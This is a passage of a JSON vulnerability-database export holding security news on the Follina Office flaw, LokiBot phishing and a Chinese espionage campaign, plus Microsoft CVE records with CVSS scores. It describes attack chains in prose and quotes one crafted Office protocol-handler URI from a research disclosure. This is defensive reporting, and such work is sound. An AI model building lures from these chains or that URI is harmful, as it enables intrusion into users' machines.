Office 2019, and Office 2021, as well as Professional Plus editions, are impacted. \n\n\"To help protect customers, we've published CVE-2022-30190 and additional guidance [here](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>),\" a Microsoft spokesperson told The Hacker News in an emailed statement.\n\nThe [Follina](<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e>) vulnerability, which came to light late last week, involved a real-world exploit that leveraged the shortcoming in a weaponized Word document to execute arbitrary PowerShell code by making use of the \"ms-msdt:\" URI scheme. The sample was uploaded to VirusTotal from Belarus.\n\nBut first signs of exploitation of the flaw date back to April 12, 2022, when a second sample was uploaded to the malware database. This artifact is believed to have targeted users in Russia with a malicious Word document (\"[\u043f\u0440\u0438\u0433\u043b\u0430\u0448\u0435\u043d\u0438\u0435 \u043d\u0430 \u0438\u043d\u0442\u0435\u0440\u0432\u044c\u044e.doc](<https://www.virustotal.com/gui/file/710370f6142d945e142890eb427a368bfc6c5fe13a963f952fb884c38ef06bfa/detection/>)\") that masqueraded as an interview invitation with Sputnik Radio.\n\n\"A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word,\" Microsoft said in an advisory for CVE-2022-30190.\n\n\"An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user's rights.\"\n\n[![](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjDwwcRQQLel_buVz-cP2D87KQ9SRU9AxTyvKVy-yD0XyMjUWUJFIiu7fTBhtdu6J7nG76FktwEvqkjodphqnX--IwjAE_tEPQTVOrmlwWn6clHVQN0Ff7NvAu4wTmjsB3-cqjcU7OCOKQCCRGIY7JfsIBzOdqeZZ0DGfE37Z640iuKSDL2OtIBiu2q/s728-e100/hacking.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjDwwcRQQLel_buVz-cP2D87KQ9SRU9AxTyvKVy-yD0XyMjUWUJFIiu7fTBhtdu6J7nG76FktwEvqkjodphqnX--IwjAE_tEPQTVOrmlwWn6clHVQN0Ff7NvAu4wTmjsB3-cqjcU7OCOKQCCRGIY7JfsIBzOdqeZZ0DGfE37Z640iuKSDL2OtIBiu2q/s728-e100/hacking.jpg>)\n\nThe tech giant credited crazyman, a member of the [Shadow Chaser Group](<https://twitter.com/ShadowChasing1>), for reporting the flaw on April 12, coinciding with the discovery of the in-the-wild exploit targeting Russian users, indicating the company had been already aware of the vulnerability.\n\nIndeed, according to [screenshots](<https://twitter.com/CrazymanArmy/status/1531117401181671430>) shared by the researcher on Twitter, Microsoft closed the vulnerability submission report on April 21, 2022 stating \"the issue has been fixed,\" while also dismissing the flaw as \"not a security issue\" since it requires a passkey provided by a support technician when starting the diagnostic tool.\n\nBesides releasing detection rules for Microsoft Defender for Endpoint, the Redmond-based company has offered workarounds in its guidance to disable the MSDT URL protocol via a Windows Registry modification.\n\n\"If the calling application is a Microsoft Office application, by default, Microsoft Office opens documents from the internet in Protected View or Application Guard for Office, both of which prevent the current attack,\" Microsoft said.\n\nThis is not the first time Microsoft Office protocol schemes like \"ms-msdt:\" have come under the scanner for their potential misuse. Earlier this January, German cybersecurity company SySS [disclosed](<https://blog.syss.com/posts/abusing-ms-office-protos/>) how it's possible to open files directly via specially crafted URLs such as \"ms-excel:ofv|u|https://192.168.1.10/poc[.]xls.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2022-05-31T05:12:00", "type": "thn", "title": "Microsoft Releases Workarounds for Office Vulnerability Under Active Exploitation", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-30190"], "modified": "2022-05-31T17:53:19", "id": "THN:1EFEC00D867275514EA180819C9EF104", "href": "https://thehackernews.com/2022/05/microsoft-releases-workarounds-for.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-17T10:25:40", "description": "[![Microsoft Word](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjJOMAEPqVWWitHSvFnZCKLyOSaDJql5EnF-l96RW57mmexBC_GQqnd__4R64YlOri0OO7PI1E6Pz9ezQs2U8kPJJA_6b2rXJnClq7hdpQjRTSwBjMOACqATXTcr67r69MFPbkkIxmbAcrcHcOa4bK7EWNBIVqGb74_0P1I1nXV7ZrpYVHtpOPYFnbxDxU9/s728-e365/macro.jpg>)\n\nMicrosoft Word documents exploiting known remote code execution flaws are being used as phishing lures to drop malware called **LokiBot** on compromised systems.\n\n\"LokiBot, also known as Loki PWS, has been a well-known information-stealing Trojan active since 2015,\" Fortinet FortiGuard Labs researcher Cara Lin [said](<https://www.fortinet.com/blog/threat-research/lokibot-targets-microsoft-office-document-using-vulnerabilities-and-macros>). \"It primarily targets Windows systems and aims to gather sensitive information from infected machines.\"\n\nThe cybersecurity company, which spotted the campaign in May 2023, said the attacks take advantage of [CVE-2021-40444](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>) and [CVE-2022-30190](<https://thehackernews.com/2023/07/romcom-rat-targeting-nato-and-ukraine.html>) (aka Follina) to achieve code execution.\n\nThe Word file that weaponizes CVE-2021-40444 contains an external GoFile link embedded within an XML file that leads to the download of an HTML file, which exploits Follina to download a next-stage payload, an injector module written in Visual Basic that decrypts and launches LokiBot.\n\nThe injector also features evasion techniques to check for the presence of debuggers and determine if it's running in a virtualized environment.\n\n[![LokiBot Malware](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhY0lBlalarJC15jGyY-iAo2cMsq9PmNO4l9CUjSvoLs_pFjhqaurstC3hpmGK9Z_LVY_Jzn5eET2tVtVC6fXjHE3_x17nB7UHLASP0A2WJSOfZKzS1XZgB0b5823Y1rklx3CtJLIzZLZZAWo8Py2PPQZEYFUQR-ZmWWl9JmGCLVLfE-PUdMq-d3r2MlL57/s728-e365/doc.jpg>)\n\nAn alternative chain discovered towards the end of May starts with a Word document incorporating a VBA script that executes a macro immediately upon opening the document using the \"Auto_Open\" and \"Document_Open\" functions.\n\nThe macro script subsequently acts as a conduit to deliver an interim payload from a remote server, which also functions as an injector to load LokiBot and connect to a command-and-control (C2) server.\n\nUPCOMING WEBINAR\n\n[Shield Against Insider Threats: Master SaaS Security Posture Management\n\n](<https://thn.news/I26t1VFD>)\n\nWorried about insider threats? We've got you covered! Join this webinar to explore practical strategies and the secrets of proactive security with SaaS Security Posture Management.\n\n[Join Today](<https://thn.news/I26t1VFD>)\n\n[LokiBot](<https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws>), not to be confused with an [Android banking trojan](<https://malpedia.caad.fkie.fraunhofer.de/details/apk.lokibot>) of the same name, comes with capabilities to log keystrokes, capture screenshots, gather login credential information from web browsers, and siphon data from a variety of cryptocurrency wallets.\n\n\"LokiBot is a long-standing and widespread malware active for many years,\" Lin said. \"Its functionalities have matured over time, making it easy for cybercriminals to use it to steal sensitive data from victims. The attackers behind LokiBot continually update their initial access methods, allowing their malware campaign to find more efficient ways to spread and infect systems.\"\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-07-17T09:04:00", "type": "thn", "title": "Cybercriminals Exploit Microsoft Word Vulnerabilities to Deploy LokiBot Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2022-30190"], "modified": "2023-07-17T09:04:48", "id": "THN:1B5512B7CB75F82A34395AC39A9B2680", "href": "https://thehackernews.com/2023/07/cybercriminals-exploit-microsoft-word.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-26T14:15:34", "description": "[![Chinese Espionage Hackers](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEges_oQp6YhYMafMFx5Bgh8Fw8z_Kw493RaFfsAEw_JLzOOb54c2i2bgfnW0FkTDBs_MLV-X6J32JSn8EBWja2e8VH9MYvtZfC3m9Xs1Ck2EOk_lIL4zHqZmFa7fbJAAlzH_V51OPs9BCNXC5F1-I_8AXChplDz3fUP8Fz9uaAnTNKyLSMHA_EkxVus/s728-e1000/code.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEges_oQp6YhYMafMFx5Bgh8Fw8z_Kw493RaFfsAEw_JLzOOb54c2i2bgfnW0FkTDBs_MLV-X6J32JSn8EBWja2e8VH9MYvtZfC3m9Xs1Ck2EOk_lIL4zHqZmFa7fbJAAlzH_V51OPs9BCNXC5F1-I_8AXChplDz3fUP8Fz9uaAnTNKyLSMHA_EkxVus/s728-e100/code.jpg>)\n\nA China-aligned advanced persistent threat actor known as TA413 weaponized recently disclosed flaws in Sophos Firewall and Microsoft Office to deploy a never-before-seen backdoor called **LOWZERO **as part of an espionage campaign aimed at Tibetan entities.\n\nTargets primarily consisted of organizations associated with the Tibetan community, including enterprises associated with the Tibetan government-in-exile.\n\nThe intrusions involved the exploitation of [CVE-2022-1040](<https://thehackernews.com/2022/06/chinese-hackers-exploited-sophos.html>) and [CVE-2022-30190](<https://thehackernews.com/2022/06/state-backed-hackers-exploit-microsoft.html>) (aka \"Follina\"), two remote code execution vulnerabilities in Sophos Firewall and Microsoft Office, respectively.\n\n\"This willingness to rapidly incorporate new techniques and methods of initial access contrasts with the group's continued use of well known and reported capabilities, such as the Royal Road RTF weaponizer, and often lax infrastructure procurement tendencies,\" Recorded Future [said](<https://www.recordedfuture.com/chinese-state-sponsored-group-ta413-adopts-new-capabilities-in-pursuit-of-tibetan-targets>) in a new technical analysis.\n\nTA413, also known as LuckyCat, has been linked to relentlessly targeting organizations and individuals associated with the Tibetan community at least since 2020 using malware such as ExileRAT, Sepulcher, and a malicious Mozilla Firefox browser extension dubbed [FriarFox](<https://thehackernews.com/2021/02/chinese-hackers-using-firefox-extension.html>).\n\n[![Chinese Espionage Hackers](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiA6KaN98j8MBSFqaYNe3Dod86yILo_svn3l1ASNt_XF8pjnD-xxQspWUwkZLgODzNBkYLJ_tz2JD7T6amhNIP2_z_Y4h02QRpPA5iEkXLXi2RUK43WPK_MrAE7E8xcSV3rroxTL4wnxq00AUp3OXhrP5XHzbk4BQaHYJYjzWVp0fGAuT-LeC7f5CI6/s728-e1000/dll.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiA6KaN98j8MBSFqaYNe3Dod86yILo_svn3l1ASNt_XF8pjnD-xxQspWUwkZLgODzNBkYLJ_tz2JD7T6amhNIP2_z_Y4h02QRpPA5iEkXLXi2RUK43WPK_MrAE7E8xcSV3rroxTL4wnxq00AUp3OXhrP5XHzbk4BQaHYJYjzWVp0fGAuT-LeC7f5CI6/s728-e100/dll.jpg>)\n\nThe group's exploitation of the Follina flaw was previously [highlighted](<https://thehackernews.com/2022/05/chinese-hackers-begin-exploiting-latest.html>) by Proofpoint in June 2022, although the ultimate end goal of the infection chains remained unclear.\n\nAlso put to use in a spear-phishing attack identified in May 2022 was a malicious RTF document that exploited flaws in Microsoft Equation Editor to drop the custom LOWZERO implant. This was achieved by employing a [Royal Road RTF weaponizer tool](<https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html>), which is widely shared among Chinese threat actors.\n\nIn another phishing email sent to a Tibetan target in late May, a Microsoft Word attachment hosted on the Google Firebase service attempted to leverage the Follina vulnerability to execute a PowerShell command designed to download the backdoor from a remote server.\n\nLOWZERO, the backdoor, is capable of receiving additional modules from its command-and-control (C2) server, but only on the condition that the compromised machine is deemed to be of interest to the threat actor.\n\n\"The group continues to incorporate new capabilities while also relying on tried-and-tested [tactics, techniques, and procedures,\" the cybersecurity firm said.\n\n\"TA413's adoption of both zero-day and recently published vulnerabilities is indicative of [wider](<https://www.technologyreview.com/2022/02/28/1046575/how-china-built-a-one-of-a-kind-cyber-espionage-behemoth-to-last/>) [trends](<https://www.crowdstrike.com/global-threat-report/>) with Chinese cyber-espionage groups whereby exploits regularly appear in use by multiple distinct Chinese activity groups prior to their widespread public availability.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-26T12:14:00", "type": "thn", "title": "Chinese Espionage Hackers Target Tibetans Using New LOWZERO Backdoor", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1040", "CVE-2022-30190"], "modified": "2022-09-26T13:59:50", "id": "THN:44DD118DC206D25EB4ECAE95173FE16E", "href": "https://thehackernews.com/2022/09/chinese-espionage-hackers-target.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2023-12-06T17:01:08", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-12T07:00:00", "type": "mscve", "title": "Windows Graphics Component Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30221"], "modified": "2022-07-12T07:00:00", "id": "MS:CVE-2022-30221", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30221", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-06T17:01:05", "description": "", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T07:00:00", "type": "mscve", "title": "Windows Network File System Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22039"], "modified": "2022-07-12T07:00:00", "id": "MS:CVE-2022-22039", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22039", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-12-06T17:01:03", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T07:00:00", "type": "mscve", "title": "Windows Client Server Run-time Subsystem (CSRSS) Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22047"], "modified": "2022-07-12T07:00:00", "id": "MS:CVE-2022-22047", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22047", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T17:01:06", "description": "", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T07:00:00", "type": "mscve", "title": "Windows Network File System Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22029"], "modified": "2022-07-12T07:00:00", "id": "MS:CVE-2022-22029", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22029", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-06T17:01:05", "description": "", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T07:00:00", "type": "mscve", "title": "Remote Procedure Call Runtime Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22038"], "modified": "2022-07-12T07:00:00", "id": "MS:CVE-2022-22038", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22038", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-06T17:01:13", "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2022>) for more information.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-06T16:32:48", "type": "mscve", "title": "Chromium: CVE-2022-2294 Heap buffer overflow in WebRTC", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-2294"], "modified": "2022-07-07T07:00:00", "id": "MS:CVE-2022-2294", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-2294", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-06T17:01:26", "description": "A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user\u2019s rights.\n\nPlease see the [MSRC Blog Entry](<https://aka.ms/CVE-2022-30190-Guidance>) for important information about steps you can take to protect your system from this vulnerability.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-30T07:00:00", "type": "mscve", "title": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-14T07:00:00", "id": "MS:CVE-2022-30190", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T17:01:13", "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2022>) for more information.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-06T16:32:51", "type": "mscve", "title": "Chromium: CVE-2022-2295 Type Confusion in V8", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-2295"], "modified": "2022-07-07T07:00:00", "id": "MS:CVE-2022-2295", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-2295", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-06T17:00:50", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-09T07:00:00", "type": "mscve", "title": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190", "CVE-2022-34713"], "modified": "2022-08-10T07:00:00", "id": "MS:CVE-2022-34713", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34713", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "prion": [{"lastseen": "2023-11-20T23:36:27", "description": "Windows Graphics Component Remote Code Execution Vulnerability", "cvss3": 